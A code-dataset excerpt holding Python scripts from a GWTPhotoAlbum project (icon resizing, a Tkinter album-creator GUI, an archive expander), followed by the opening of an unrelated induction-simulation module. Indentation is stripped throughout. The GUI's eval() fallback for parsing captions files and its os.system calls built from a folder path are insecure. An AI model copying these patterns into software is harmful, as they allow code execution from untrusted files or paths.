src_prefix = "../iconsets/"
src_dir = os.path.join(src_prefix, "grey")
dst_dirs = [ "../war/icons" ]
#dst_dir = "/home/eckhart/tmp"
## begin and end buttons are not needed any more
#base_names = ["begin", "begin_down", "back", "back_down",
# "gallery", "gallery_down", "play", "pause",
# "next", "next_down", "end", "end_down"]
base_names = ["back", "back_down", "gallery", "gallery_down",
"play", "pause", "next", "next_down"]
file_type = ".png"
copy_only_names = ["start.png", "start_down.png"]
im_sizes = [64, 48, 32, 24, 16]
def greyFilter(rgba, weight):
m = sum(rgba[0:3])/3.0
r = int(m * weight + rgba[0]*(1.0-weight))
g = int(m * weight + rgba[1]*(1.0-weight))
b = int(m * weight + rgba[2]*(1.0-weight))
return (r,g,b,rgba[3])
def brighten(rgba, e):
r,g,b,a = rgba
r = int(r**e * (256/(256**e)))
g = int(g**e * (256/(256**e)))
b = int(b**e * (256/(256**e)))
return (r,g,b,a)
def myfilter(rgba):
return brighten(greyFilter(rgba, 0.5), 0.6)
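# Worked example (sketch with assumed values): for greyFilter((120, 60, 30, 255), 0.5)
# the channel mean is m = 70, and each channel is blended half-way towards it,
# giving (95, 65, 50, 255); brighten then lifts the result with the power curve
# v**0.6 * 256/256**0.6, which brightens dark pixels more than bright ones.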
def apply(image, filter):
pix = image.load()
for x in range(image.size[0]):
for y in range(image.size[1]):
pix[x,y] = filter(pix[x,y])
def createSmallSizes(base_name):
try:
im = Image.open(os.path.join(src_dir, base_name+file_type))
srcW, srcH = im.size
for destH in im_sizes:
if destH != im.size[1]:
destW = srcW * destH // srcH
dest = im.resize((destW, destH), Image.ANTIALIAS)
else:
dest = im.copy()
if src_dir.find("colored") >= 0:
apply(dest, myfilter)
for dst_dir in dst_dirs:
dest.save(os.path.join(dst_dir,base_name+"_"+str(destH)+file_type),
optimize=1, transparency = (255, 255, 255)) # transparency, bits
except IOError as err:
print ("IOError", err)
def genNavigationImages():
for name in base_names:
createSmallSizes(name)
for name in copy_only_names:
for dst_dir in dst_dirs:
with open(os.path.join(src_dir, name), "rb") as src:
with open(os.path.join(dst_dir, name), "wb") as dst:
data = src.read()
dst.write(data)
if __name__ == "__main__":
if len(sys.argv) > 1:
src_dir = os.path.join(src_prefix, sys.argv[1])
genNavigationImages()
```
#### File: GWTPhotoAlbum/scripts/GWTPhotoAlbumCreator.py
```python
import os, re
from Tkinter import *
from tkMessageBox import askyesno, showerror
import tkFileDialog
import Image, ImageTk
import createGWTPhotoAlbum
from createGWTPhotoAlbum import read_caption, write_caption, \
remove_old_directories, create_directories, \
create_noscript_html, create_index_page, \
assemble, deploy, THUMBNAIL, FULLSIZE
try:
import json # python 2.6 and higher...
def toJSON(var, indentation=2):
return json.dumps(var, sort_keys=True, indent=indentation)
def fromJSON(jsonString):
return json.loads(jsonString)
except ImportError:
def toJSON(var, indentation=2):
return repr(var)
def fromJSON(jsonString):
return eval(jsonString)
VERSION = "0.8.9"
about_text="GWTPhotoAlbumCreater.py\n\nVersion "+VERSION+"\n\n"+\
"""
A program to create an html/AJAX photo album from a collection of images.
See: http://code.google.com/p/gwtphotoalbum/ for more information and
source codes
Copyright (C) 2008-2013 <NAME> (<EMAIL> <EMAIL>).
Licensed under the Apache License, Version 2.0 (the "License"); you may not
use this file except in compliance with the License. You may obtain a copy of
the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
"""
FRAME_W, FRAME_H = 780, 560
selectableResolutions = ((320, 240), (640, 480), (1024, 768),
(1440, 900), (1920, 1200))
def parseFileNameString(s):
"""Returns a list of files contained in the string."""
l = []; i = 0; N = len(s)
while i < N:
while s[i] == " ": i += 1
if s[i] == "{":
k = i+1
while k < N and s[k] != "}": k += 1
l.append(s[i+1:k])
i = k+1
else:
k = i+1
while k < N and s[k] != " ": k += 1
l.append(s[i:k])
i = k+1
return l
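# Doctest-style sketch (hypothetical paths): on Windows the Tk file dialog
# may hand back a single string in which names containing spaces are braced:
# >>> parseFileNameString('{C:/My Photos/a.jpg} b.png')
# ['C:/My Photos/a.jpg', 'b.png']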
def compatibleFileDialogResult(listOrString):
"""Makes sure that the return value of a tk file dialog is a list
of strings and not a single string, as on Windows platforms."""
if type(listOrString) == type("") \
or type(listOrString) == type(u""):
flist = parseFileNameString(listOrString)
else:
flist = listOrString
return [os.path.normpath(path) for path in flist]
class ThumbDB:
def __init__(self, w = 240, h = 240):
self.W, self.H = w, h
self.thumbs = {}
self.quickThumbs = {}
self.register = {}
def get(self, filepath, width=-1, height=-1):
if width <= 0: width = self.W
if height <= 0: height = self.H
if (width, height, filepath) in self.quickThumbs:
return self.quickThumbs[(width, height, filepath)]
if filepath not in self.thumbs \
or width >= self.W or height >= self.H:
try:
img = Image.open(filepath)
img.load()
x = max(self.W, width)
y = max(self.H, height)
w, h = createGWTPhotoAlbum.adjustSize(img.size, (x, y))
img = img.resize((2*w, 2*h), Image.NEAREST)
self.thumbs[filepath] = img
except IOError:
showerror(title = "Error:",
message = "could not open file " +
self.album.files(self.selection))
return None
img = self.thumbs[filepath]
w,h = createGWTPhotoAlbum.adjustSize(img.size, (width, height))
img = img.resize((w, h), Image.BILINEAR)
tkimg = ImageTk.PhotoImage(img)
if filepath not in self.register or self.register[filepath] <= 3:
self.quickThumbs[(width, height, filepath)] = tkimg
self.register[filepath] = self.register.setdefault(filepath, 0)+1
return tkimg
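# Usage sketch (hypothetical path): thumbDb.get("/photos/a.jpg", 160, 120)
# loads the image once at double resolution, caches it in self.thumbs, and
# returns an ImageTk.PhotoImage scaled to fit into 160x120; only the first
# few requests per file are additionally memoized in the quickThumbs cache.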
thumbDb = ThumbDB()
class WebAlbum:
def __init__(self):
self.entries = []
self.files = {}
self.captions = {}
self.captionsTouched = set()
self.compression = (85, 70)
sr = selectableResolutions
self.resolutions = set(sr)
self.gallery = True
self.title = ""
self.subtitle = ""
self.bottomline = ""
self.fullscreen = True
self.filmstrip = True
self.originals = False
self.overblend = False
self.createhtml = True
self.addjsontohtml = True
self.destfolder = "album"
def createWebAlbum(self, logger = lambda name: 0):
"""Creates the GWTPhotoAlbum. Returns True, if everything went fine."""
if os.path.exists(self.destfolder):
showerror(title="GWTPhotoAlbumCreator.py - error!",
message="Directory:\n%s\n"%self.destfolder+
"already exists!\nPlease chose a different "+
"output directory name.")
return False
save_info = createGWTPhotoAlbum.info
info = {}; info.update(save_info)
info["title"] = self.title
info["subtitle"] = self.subtitle
info["image clickable"] = "true"
if self.gallery: info["presentation type"] = "gallery"
else: info["presentation type"] = "slideshow"
info["disable scrolling"] = "true"
if self.fullscreen:
if self.filmstrip:
info["layout type"] = "fullscreen"
info["layout data"] = "IOFT"
else:
info["layout type"] = "fullscreen"
info["layout data"] = "CIPT"
else:
if self.filmstrip:
info["layout type"] = "tiled"
info["layout data"] = "ICFT"
else:
info["layout type"] = "tiled"
info["layout data"] = "ICPT"
if self.overblend:
info["image fading"] = "1000"
else:
info["image fading"] = "-750"
filelist = [self.files[entry] for entry in self.entries]
sizes = list(self.resolutions)
sizes.sort()
sizes.insert(0, THUMBNAIL)
if self.originals:
createGWTPhotoAlbum.create_picture_archive = True
#createGWTPhotoAlbum.archive_quality = 80
if self.bottomline == "":
self.bottomline = '<a href="pictures.zip">download all pictures</a>'
#sizes.append(FULLSIZE)
else:
createGWTPhotoAlbum.create_picture_archive = False
info["bottom line"] = self.bottomline
#for key in self.captions:
# self.captions[key] = re.sub("\\\n", "<br />", self.captions[key])
createGWTPhotoAlbum.info.update(info)
logger("creating directory: "+ self.destfolder)
remove_old_directories(self.destfolder)
create_directories(self.destfolder)
createGWTPhotoAlbum.quick_scaling = False
logger("assembling images...")
assemble(filelist, self.destfolder, sizes, self.compression[0],
self.compression[1], self.captions, logger)
logger("deploying AJAX scripts in: "+ self.destfolder)
deploy(createGWTPhotoAlbum.deploy_pack, self.destfolder,
self.addjsontohtml)
if self.createhtml:
logger("creating static html pages for browsers without javascript.")
create_noscript_html(filelist, self.destfolder, sizes)
create_index_page(self.destfolder, self.createhtml, self.addjsontohtml)
createGWTPhotoAlbum.info.update(save_info)
return True
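# Configuration sketch: a fullscreen album with a film strip yields
# info["layout type"] == "fullscreen" and info["layout data"] == "IOFT";
# dropping the film strip switches the layout data to "CIPT", and the
# tiled variants use "ICFT" and "ICPT" respectively.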
def add(self, filepath):
"""Adds the image at location 'filepath'. Returns file name w/o path.
"""
name = os.path.basename(filepath)
if name in self.entries:
showerror(title="GWTPhotoAlbumCreator.py - Error!",
message="An image named\n%s\nalready "%name+
"exists in the gallery!")
return
caption = read_caption(filepath)
if caption: self.captions[name] = caption
else: self.captions[name] = ""
self.entries.append(name)
self.files[name] = filepath
return name
def remove(self, name):
"""Removes the image with the filename 'name' (not the full path!).
"""
self.entries.remove(name)
del self.files[name]
if name in self.captions: del self.captions[name]
if name in self.captionsTouched: self.captionsTouched.remove(name)
def getCaption(self, name):
"""Returns the caption associated with the image 'name'."""
if name in self.captions:
return re.sub("(<br />)|(<br>)", "\n", self.captions[name])
else:
return ""
def changeCaption(self, name, caption, writeToFile = False):
"""Changes the caption of image 'name' to 'caption'.
Optionally, writes the new caption to the image file after changing.
"""
assert name in self.entries
while len(caption) > 0 and caption[-1] == "\n": caption = caption[:-1]
caption = re.sub("\\\n", "<br />", caption)
if name not in self.captions or self.captions[name] != caption:
self.captionsTouched.add(name)
self.captions[name] = caption
if writeToFile:
write_caption(self.files[name], caption)
def writeBackCaptions(self):
for name in self.captionsTouched:
write_caption(self.files[name], self.captions[name])
self.captionsTouched = set()
def strippedCaptions(self):
"""Returns the captions dictionary with all empty captions eliminated.
"""
stripped = {}
for key, value in self.captions.items():
if value:
stripped[key] = value
return stripped
def pick(self, centerImg):
"""Returns the paths names of the images:
centerImg-1, centerImg, centerImg+1"""
ret = []
if centerImg > 0:
ret.append(self.files[self.entries[centerImg-1]])
else:
ret.append(None)
ret.append(self.files[self.entries[centerImg]])
if centerImg < len(self.entries)-1:
ret.append(self.files[self.entries[centerImg+1]])
else:
ret.append(None)
return ret
def ImagesToCanvas(canvas, imgPaths):
"""Adds the 3 images from imgPaths (list of filepaths) to a canvas,
the center image slightly bigger. Returns a list of tuples (tag, img)."""
ret = []
w = int(canvas["width"])/4
h = int(canvas["height"])
ww = [w*2/3, 2*w, w*2/3]
hh = [h*2/3, h, h*2/3]
for i in range(3):
if imgPaths[i]:
img = thumbDb.get(imgPaths[i], ww[i], hh[i])
tag = canvas.create_image(w/2 + i*3*w/2, h/2, image = img)
ret.append((tag, img))
else:
ret.append((-1, None))
return ret
class Card:
def __init__(self, frame):
self.frame = frame
def activate(self):
pass
def deactivate(self):
pass
def validate(self):
return True
class CardStack(Frame):
def __init__(self, parent, action = None):
Frame.__init__(self, parent)
self.config(relief=FLAT, bd=0)
self.buttonrow = Frame(self, relief=SUNKEN, bd=2)
self.buttonrow.pack(side=TOP, fill=X)
self.cardstack = Frame(self, relief=RAISED, bd=2)
self.cardstack.pack(side=BOTTOM, fill=BOTH, expand=1)
self.cardstack.config(width=FRAME_W, height=FRAME_H)
self.buttons = {}
self.cards = {}
self.cardList = []
self.last = None
self.action = action
def add(self, name, createCardFunc):
button = Button(self.buttonrow, bd=2, text=name, relief = SUNKEN,
command=lambda self=self,t=name: self.switch(t))
button.pack(side=LEFT, fill=Y)
self.buttons[name] = button
frame = Frame(self.cardstack, bd=0, relief=FLAT)
frame.place(relx=0.0, rely=0.0, relwidth=1.0, relheight=1.0)
#card.pack(fill=BOTH, expand=1)
card = createCardFunc(frame)
self.cards[name] = card
self.cardList.append(name)
return card
def currentCard(self):
return self.last
def getCard(self, name):
return self.cards[name]
def switch(self, name):
if self.last:
self.buttons[self.last]["relief"] = SUNKEN
self.cards[self.last].deactivate()
self.buttons[name]["relief"] = RAISED
self.last = name
card = self.cards[name]
card.frame.tkraise()
card.activate()
if self.action: self.action()
class AboutCard(Card):
def __init__(self, parent, start = lambda:1, quit = lambda:1):
Card.__init__(self, parent)
self.parent = parent
label = Label(parent, text='About "GWTPhotoAlbumCreator.py":')
label.pack()
self.text=Text(parent)
self.text.pack(fill=BOTH, expand=1)
f = Frame(parent); f.pack()
Button(f, text="Start ->", command=start).pack(side=LEFT)
Button(f, text="Quit!", command=quit).pack(side=RIGHT)
def activate(self):
self.text.delete("1.0", END)
self.text.insert(END, about_text)
def clear(self):
self.text.delete("1.0", END)
def logger(self, text):
self.text.insert(END, text+"\n")
#self.parent.update_idletasks()
self.parent.update()
class CaptionsCard(Card):
def __init__(self, parent, album):
Card.__init__(self, parent)
self.album = album
label = Label(parent, text="Add images and enter image captions:")
label["bg"] = "#FFFF50"
label.pack(side=TOP)
self.top = Canvas(parent)
self.top.pack(side=TOP)
self.top["width"] = FRAME_W-40
self.top["height"] = FRAME_H/2
w = int(self.top["width"])
h = int(self.top["height"])
self.images = [(-1, None), (-1, None), (-1, None)]
bottom = Frame(parent)
bottom.pack(side=BOTTOM, fill=BOTH, expand=1)
upper_bottom = Frame(bottom)
upper_bottom.pack(side=TOP, fill=BOTH, expand=1)
left = Frame(upper_bottom)
left.pack(side=LEFT, fill=BOTH, expand=1)
buttonRow = Frame(left)
buttonRow.pack(side=TOP, fill=X)
self.add = Button(buttonRow, text="Add ...", command=self.onAdd)
self.add["width"] = 6
self.add.pack(side=LEFT)
self.sort = Button(buttonRow, text="Sort by Date & Time", command=self.onSort)
self.sort["width"] = 15
self.sort.pack(side=LEFT)
self.sortAlpha = Button(buttonRow, text="Sort by Name", command=self.onSortAlpha)
self.sortAlpha["width"] = 12
self.sortAlpha.pack(side=LEFT)
self.remove = Button(buttonRow, text="Remove", command=self.onRemove)
self.remove["width"] = 6
self.remove.pack(side=RIGHT)
lbox = Frame(left)
lbox.pack(side=BOTTOM, fill=BOTH, expand=1)
scrollbar = Scrollbar(lbox, orient=VERTICAL)
self.listbox = Listbox(lbox, selectmode = EXTENDED,
yscrollcommand=scrollbar.set)
scrollbar.config(command=self.listbox.yview)
scrollbar.pack(side=RIGHT, fill=Y)
self.listbox.pack(side=TOP, fill=BOTH, expand=1)
self.listbox.bind("<ButtonRelease-1>", lambda event: self.onSelect())
self.listbox.bind("<Up>", lambda event: self.onKeyUp())
self.listbox.bind("<Down>", lambda event: self.onKeyDown())
if self.album.entries:
self.selection = self.album.entries[0]
else:
self.selection = ""
buttonCol = Frame(upper_bottom)
buttonCol.pack(side= RIGHT)
self.up = Button(buttonCol, text="up", command=self.onUp)
self.up["width"] = 5
self.up.pack()
self.down = Button(buttonCol, text="down", command=self.onDown)
self.down["width"] = 5
self.down.pack()
lower_bottom = Frame(bottom)
lower_bottom.pack(side=BOTTOM)
lower_left = Frame(lower_bottom)
lower_left.pack(side=LEFT)
self.loadCapJSON = Button(lower_left, text="Load captions...", command=self.loadFromJSON)
self.loadCapJSON.pack(side=TOP)
self.saveCapJSON = Button(lower_left, text="Save captions...", command=self.writeToJSON)
self.saveCapJSON.pack(side=BOTTOM)
self.textedit = Text(lower_bottom)
self.textedit["height"] = 5
self.textedit["width"] = 70
self.textedit["background"] = "#FFFFCF"
self.textedit.pack(side=LEFT)
right = Frame(lower_bottom)
right.pack(side=RIGHT)
self.reset = Button(right, text="Reset", command=self.onReset)
self.reset.pack(side=TOP)
self.saveIt = BooleanVar()
self.saveCheck = Checkbutton(right, text="Add to image file",
var = self.saveIt)
self.saveCheck["width"]=20
self.saveCheck.pack(side=BOTTOM)
def onUp(self):
items = [int(s) for s in self.listbox.curselection()]
items.sort()
i = 0
while len(items) > 0 and items[0] == i:
del items[0]
i += 1
for i in items:
name = self.album.entries[i]
del self.album.entries[i]
self.album.entries.insert(i-1, name)
self.listbox.delete(i)
self.listbox.insert(i-1, name)
for i in items:
self.listbox.select_set(i-1)
self.onSelect()
def onDown(self):
items = [int(s) for s in self.listbox.curselection()]
items.sort()
items.reverse()
i = len(self.album.entries)-1
while len(items) > 0 and items[0] == i:
del items[0]
i -= 1
for i in items:
name = self.album.entries[i]
del self.album.entries[i]
self.album.entries.insert(i+1, name)
self.listbox.delete(i)
self.listbox.insert(i+1, name)
for i in items:
self.listbox.select_set(i+1)
self.onSelect()
def onAdd(self):
formats = [("JPEG", "*.jpg"),
("Portable Network Graphics", "*.png"),
("All file types", "*")]
flist = tkFileDialog.askopenfilenames(title="Please select images",
filetypes = formats)
flist = compatibleFileDialogResult(flist)
for path in flist:
if os.path.exists(path):
name = self.album.add(path)
self.listbox.insert(END, name)
if self.album.entries and not self.selection:
self.select(self.album.entries[0])
def onRemove(self):
items = [int(s) for s in self.listbox.curselection()]
items.sort()
items.reverse()
for i in items:
name = self.album.entries[i]
self.selection = name
self.storeCaption()
self.album.remove(name)
self.listbox.delete(i)
if items and items[-1] < len(self.album.entries):
self.selection = self.album.entries[items[-1]]
self.select(self.selection)
else:
self.selection = ""
def onSort(self):
file_list = [self.album.files[entry] for entry in self.album.entries]
file_list = createGWTPhotoAlbum.sort_images(file_list)
self.album.entries = [os.path.basename(path) for path in file_list]
for entry in self.album.entries:
self.listbox.delete(0)
self.listbox.insert(END, entry)
self.select(self.selection)
def onSortAlpha(self):
self.album.entries.sort()
for entry in self.album.entries:
self.listbox.delete(0)
self.listbox.insert(END, entry)
self.select(self.selection)
def select(self, name):
self.selection = name
self.listbox.select_set(self.album.entries.index(name))
self.onSelect()
def activate(self):
self.listbox.delete(0, END)
for e in self.album.entries:
self.listbox.insert(END, e)
if self.selection in self.album.entries:
self.select(self.selection)
elif len(self.album.entries) > 0:
self.selection = self.album.entries[0]
self.select(self.album.entries[0])
else:
self.selection = ""
if self.selection:
self.textedit.delete("1.0", END)
self.textedit.insert(END, self.album.getCaption(self.selection))
def storeCaption(self):
if self.selection:
caption = self.textedit.get("1.0", END)
self.album.changeCaption(self.selection, caption,
False) # self.saveIt.get()
def deactivate(self):
self.storeCaption()
if self.saveIt.get() and self.album.captionsTouched and \
askyesno(title="Question:",
message="Do you really want to write back\n"+
"changed captions to the original\n"+
"image files?"):
self.album.writeBackCaptions()
self.textedit.delete("1.0", END)
def updateCanvas(self, selected):
self.top.delete(ALL)
newSelection = ""
if selected >= 0:
self.images = ImagesToCanvas(self.top, self.album.pick(selected))
newSelection = self.album.entries[selected]
if newSelection != self.selection:
self.storeCaption()
self.selection = newSelection
caption = self.album.getCaption(newSelection)
self.textedit.delete("1.0", END)
self.textedit.insert(END, caption)
def readSelection(self):
items = self.listbox.curselection()
if items:
return int(items[0])
else:
return -1
def onSelect(self):
self.updateCanvas(self.readSelection())
def onKeyUp(self):
nr = self.readSelection()
if nr > 0:
self.updateCanvas(nr-1)
def onKeyDown(self):
nr = self.readSelection()
if nr < len(self.album.entries)-1:
self.updateCanvas(nr+1)
def onReset(self):
if self.selection:
caption = self.album.getCaption(self.selection)
else:
caption = ""
self.textedit.delete("1.0", END)
self.textedit.insert(END, caption)
def loadFromJSON(self):
flist = tkFileDialog.askopenfilenames(title="Open captions file...",
filetypes = [("JSON file", "*.json"),
("All files", "*")],
initialfile = "captions.json",
multiple = False)
if flist:
name = compatibleFileDialogResult(flist)[0]
try:
f = open(name)
json_str = f.read()
f.close()
try:
cap = fromJSON(json_str)
except ValueError:
showerror(title = "Error:",
message = "file: "+name+" is malformed!")
return
if type(cap) == type({}):
self.album.captions = cap
caption = self.album.getCaption(self.selection)
self.textedit.delete("1.0", END)
self.textedit.insert(END, caption)
else:
showerror(title = "Error:",
message = "file "+name+" does not contain a\n"+
"captions dictionary")
except IOError:
showerror(title = "Error:",
message = "could not read file: "+name)
def writeToJSON(self):
name = tkFileDialog.asksaveasfilename(title="Write captions file...",
filetypes = [("JSON file", "*.json"),
("All files", "*")],
initialfile = "captions.json")
if name:
#name = compatibleFileDialogResult(flist)[0]
if not name.lower().endswith(".json"):
name += ".json"
else: name = ""
if name and (not os.path.exists(name) or \
askyesno(title="Question:",
message="Do you really want to overwrite\n"+
"file: '"+name+"' ?")):
json_str = toJSON(self.album.captions)
try:
f = open(name, "w")
f.write(json_str)
f.close()
except IOError:
showerror(title = "Error:",
message = "could not write file: "+name)
def validate(self):
if len(self.album.entries) == 0:
showerror(title="GWTPhotoAlbumCreator.py - Missing data!",
message="Please add some images first!")
return False
else:
return True
class ResolutionsCard(Card):
def __init__(self, parent, album):
Card.__init__(self, parent)
self.album = album
self.resolutions = selectableResolutions
self.rack = {}
for res in self.resolutions:
self.rack[res] = BooleanVar()
label = Label(parent, text="Select destination image resolutions "+\
"and compression:")
label["bg"] = "#FFFF50"
label.pack()
Label(parent, text=" ").pack()
f1 = Frame(parent)
f1.pack()
for res in self.resolutions:
cb = Checkbutton(f1, text="%sx%s pixel"%res,
var = self.rack[res])
cb.pack(anchor=W)
Label(parent, text=" ").pack()
Label(parent, text="Compression:").pack()
f2 = Frame(parent)
f2.pack()
f3 = Frame(f2)
f3.pack(side=LEFT)
Label(f3, text="LowRes").pack()
self.lowResComp = IntVar()
self.lowResComp.set(85)
self.lowResScale = Scale(f3, var=self.lowResComp)
self.lowResScale["from"] = 50
self.lowResScale["to"] = 95
self.lowResScale.pack()
f4 = Frame(f2)
f4.pack(side=RIGHT)
Label(f4, text="HiRes").pack()
self.hiResComp = IntVar()
self.hiResComp.set(70)
self.hiResScale = Scale(f4, var=self.hiResComp)
self.hiResScale["from"] = 50
self.hiResScale["to"] = 95
self.hiResScale.pack()
Label(parent, text="Smaller values mean smaller image sizes\n"+
"but also more compression artifacts!").pack()
def activate(self):
for res in self.resolutions:
self.rack[res].set(res in self.album.resolutions)
self.lowResComp.set(self.album.compression[0])
self.hiResComp.set(self.album.compression[1])
def deactivate(self):
self.album.compression = (self.lowResComp.get(), self.hiResComp.get())
self.album.resolutions = set([res for res in self.rack.keys()
if self.rack[res].get()])
def validate(self):
if len(self.album.resolutions) == 0:
showerror(title="GWTPhotoAlbumCreator.py - Missing data!",
message="Please select one or more image resolutions!")
return False
else:
return True
class ConfigurationCard(Card):
def __init__(self, parent, album):
Card.__init__(self, parent)
self.album = album
label = Label(parent, text="Adjust the configuration, please:")
label["bg"] = "#FFFF50"
label.pack()
Label(parent, text=" ").pack()
self.gallery = BooleanVar()
self.galleryTitle = StringVar()
self.gallerySubtitle = StringVar()
self.galleryBottomLine = StringVar()
self.fullscreen = BooleanVar()
self.filmstrip = BooleanVar()
self.fullSizeImages = BooleanVar()
self.overblend = BooleanVar()
self.createhtml = BooleanVar()
self.outputFolder = StringVar()
f1 = Frame(parent)
f1.pack()
Checkbutton(f1, text="with gallery", var = self.gallery).pack(anchor=W)
Label(f1, text=" ").pack()
f2 = Frame(f1)
f2.pack(expand=1, fill=X)
f = Frame(f2); f.pack(expand=1, fill=X)
Label(f, text="gallery title: ").pack(anchor=W, side=LEFT)
Entry(f, textvariable=self.galleryTitle, width="50").pack(side=RIGHT)
f = Frame(f2); f.pack(expand=1, fill=X)
Label(f, text="gallery sub-title:").pack(anchor=W, side=LEFT)
Entry(f, textvariable=self.gallerySubtitle, width="50").pack(side=RIGHT)
f = Frame(f2); f.pack(expand=1, fill=X)
Label(f, text="gallery bottom line:").pack(anchor=W, side=LEFT)
Entry(f, textvariable=self.galleryBottomLine, width="50").pack(side=RIGHT)
Label(f1, text=" ").pack()
#Checkbutton(f1, text="full screen slide show", var = self.fullscreen).pack(anchor=W)
Checkbutton(f1, text="add a film strip", var = self.filmstrip).pack(anchor=W)
#Checkbutton(f1, text="include original images", var = self.fullSizeImages).pack(anchor=W)
Checkbutton(f1, text="overblend when changing images", var = self.overblend).pack(anchor=W)
Checkbutton(f1, text="add javascript free version", var = self.createhtml).pack(anchor=W)
Label(f1, text=" ").pack()
f = Frame(f1); f.pack()
Label(f, text="output folder: ").pack(side=LEFT)
Entry(f, textvariable=self.outputFolder, width="45").pack(side=LEFT)
Button(f, text="Browse ...", command=self.onBrowseOutputFolder).pack(side=LEFT)
def activate(self):
self.gallery.set(self.album.gallery)
self.galleryTitle.set(self.album.title)
self.gallerySubtitle.set(self.album.subtitle)
self.galleryBottomLine.set(self.album.bottomline)
self.fullscreen.set(self.album.fullscreen)
self.filmstrip.set(self.album.filmstrip)
self.fullSizeImages.set(self.album.originals)
self.overblend.set(self.album.overblend)
self.outputFolder.set(self.album.destfolder)
self.createhtml.set(self.album.createhtml)
def deactivate(self):
self.album.gallery = self.gallery.get()
self.album.title = self.galleryTitle.get()
self.album.subtitle = self.gallerySubtitle.get()
self.album.bottomline = self.galleryBottomLine.get()
self.album.fullscreen = self.fullscreen.get()
self.album.filmstrip = self.filmstrip.get()
self.album.originals = self.fullSizeImages.get()
self.album.overblend = self.overblend.get()
self.album.destfolder = self.outputFolder.get()
self.album.createhtml = self.createhtml.get()
def onBrowseOutputFolder(self):
outdir = tkFileDialog.askdirectory(title="Choose output directory")
if outdir and type(outdir) == type(""):
outdir = os.path.normpath(outdir)
if outdir: self.outputFolder.set(outdir)
def validate(self):
if self.album.gallery and not self.album.title:
return askyesno(title="GWTPhotoAlbumCreator.py - Missing data?",
message="Do you really want to leave the title\n"+
"of your gallery empty?")
else:
return True
class WebAlbumCreator(Tk):
def __init__(self):
Tk.__init__(self)
self.title("GWTPhotoAlbumCreator %s" % VERSION)
# self.config(width=800, height=600)
self.protocol("WM_DELETE_WINDOW", self.onQuit)
self.changes = False
self.frame = Frame(self)
self.frame.pack()
self.cardStack = CardStack(self.frame, self.onSelectCard)
self.cardStack.pack(side=TOP, fill=BOTH, expand=1)
self.buttonRow = Frame(self.frame)
self.buttonRow.pack(fill=X)
self.next = Button(self.buttonRow, text="Next Step ->",
command=self.onNext)
self.next["width"] = 14
self.next.pack(side=RIGHT, anchor=E)
self.previous = Button(self.buttonRow, text="<- Previous Step",
command=self.onPrev)
self.previous["width"] = 14
self.previous.pack(side=RIGHT, anchor=E)
self.album = WebAlbum()
self.cardStack.add("About",
lambda frame: AboutCard(frame, self.jumpStart, self.onQuit))
self.cardStack.add("Images",
lambda frame: CaptionsCard(frame, self.album))
self.cardStack.add("Resolutions",
lambda frame: ResolutionsCard(frame, self.album))
self.cardStack.add("Configuration",
lambda frame: ConfigurationCard(frame, self.album))
self.cardStack.switch("About")
def onNext(self):
name = self.cardStack.currentCard()
i = self.cardStack.cardList.index(name)
if i == len(self.cardStack.cardList)-1:
self.cardStack.getCard(name).deactivate()
for n in self.cardStack.cardList:
if not self.cardStack.getCard(n).validate():
self.cardStack.switch(n)
break
else:
self.cardStack.switch("About")
self.cardStack.getCard("About").clear()
self.cardStack.getCard("About").logger("creating web album; please wait...")
if self.album.createWebAlbum(self.cardStack.getCard("About").logger):
self.changes = False
self.cardStack.getCard("About").logger("finished creating web album.")
self.openBrowserWithAlbum()
else:
self.cardStack.getCard("About").logger("error while creating web album!")
else:
self.cardStack.switch(self.cardStack.cardList[i+1])
def openBrowserWithAlbum(self):
if self.album.addjsontohtml:
path = os.path.join(self.album.destfolder, "index_offline.html")
try:
os.startfile(path)
except AttributeError:
if os.system("firefox "+path+" &") != 0:
os.system("iceweasel "+path+" &")
def onPrev(self):
name = self.cardStack.currentCard()
i = self.cardStack.cardList.index(name)
if i > 0:
self.cardStack.switch(self.cardStack.cardList[i-1])
else:
self.cardStack.switch(self.cardStack.cardList[-1])
def onSelectCard(self):
cardName = self.cardStack.currentCard()
if cardName != "About": self.changes = True
if cardName == "Configuration":
self.next["text"] = "Finish"
elif self.next["text"] == "Finish":
self.next["text"] = "Next Step ->"
def jumpStart(self):
self.cardStack.switch("Images")
self.cardStack.getCard("Images").onAdd()
def onQuit(self):
if not self.changes or askyesno(title="GWTPhotoAlbumCreator.py - quit?",
message="Do you really want to quit?"):
self.destroy()
self.quit()
main = WebAlbumCreator()
main.mainloop()
```
#### File: GWTPhotoAlbum/scripts/qzexpand.py
```python
import sys, os
from PyQt4.Qt import QByteArray, qUncompress
destDir = "."
archive = "GWTPhotoAlbum-Deploy.qz"
def expand(archive, destDir):
f = open(archive, "rb")
data = f.read()
f.close()
currDir = os.getcwd()
os.chdir(destDir)
data = qUncompress(QByteArray(data)).data()
i = 0
while i < len(data):
N = int(data[i:i+10], 16); i += 10
path = data[i:i+N]; i += N
dirname, filename = os.path.split(path)
if dirname != "" and not os.path.exists(dirname):
os.makedirs(dirname)
L = int(data[i:i+10], 16); i += 10
content = data[i:i+L]; i += L
print ("writing file: "+filename+" ("+str(L/1024)+" kBytes)")
f = open(path, "wb")
f.write(content)
f.close()
os.chdir(currDir)
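# Usage sketch (hypothetical paths): expand("GWTPhotoAlbum-Deploy.qz", "www")
# qUncompress'es the archive and then walks its length-prefixed records
# (10-char hex path length, path, 10-char hex content length, content),
# recreating directories as needed and writing each file in turn.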
if __name__ == "__main__":
if "-h" in sys.argv or "--help" in sys.argv:
print (__doc__)
else:
if len(sys.argv) > 1:
archive = sys.argv[1]
if len(sys.argv) > 2:
destDir = sys.argv[2]
expand(archive, destDir)
```
|
{
"source": "jecki/MetaInductionSim",
"score": 3
}
|
#### File: jecki/MetaInductionSim/Induction.py
```python
import random
from PyPlotter.Compatibility import *
########################################################################
#
# Global Parameters
#
########################################################################
ERROR_TOLERANCE = 1.0 / 1000000.0
first_from_left = lambda l:l[0]
first_from_right = lambda l:l[-1]
random_choice = random.choice
choice = first_from_left
epsilon = 0.05
epsilonD = 0.04
hardrule = False
########################################################################
#
# Random event series functions
#
########################################################################
def randomBool(p = 0.5):
"""Return True with a probability of p."""
if random.random() < p: return True
else: return False
def getRandomEvent(p = 0.5):
"""Generate a random event that is 1 with the probability p
otherwise 0."""
if random.random() < p: return 1
else: return 0
def invertEvent(e):
"""Return the inverted event."""
if e == 1: return 0
else: return 1
########################################################################
#
# World class
#
########################################################################
class World(object):
